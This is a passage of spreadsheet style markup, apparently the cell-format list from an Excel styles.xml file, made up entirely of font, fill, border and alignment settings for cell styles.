    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="3" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="2" xfId="3" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="2" xfId="3" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="2" xfId="3" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="2" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="4" borderId="2" xfId="2" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="4" borderId="2" xfId="2" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="2" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="6" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="6" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="6" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="20" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="22" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="6" borderId="24" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="6" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="24" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="25" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="6" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="6" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="6" borderId="24" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="6" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="25" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="20" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="6" borderId="24" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="6" borderId="25" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="6" borderId="24" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="6" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="19" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="25" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="36" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="36" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="39" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="6" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="6" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="6" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="43" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="44" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="45" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="46" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="45" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="45" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="45" xfId="2" applyFont="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="45" xfId="2" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="45" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="45" xfId="2" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="45" xfId="3" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="45" xfId="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="47" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="48" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="47" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="48" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="47" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="45" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="45" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="49" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="49" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="49" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="49" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="45" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="46" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="47" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="48" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="49" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="50" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="51" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="52" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="lef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11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="53" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="45" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="51" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="50" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="52" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="52" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="53" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="45" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="45" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="47" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="48" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="54" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="61" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="62" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="61" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="62" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="65" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="justify" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="61" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="49" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="49" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="49" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
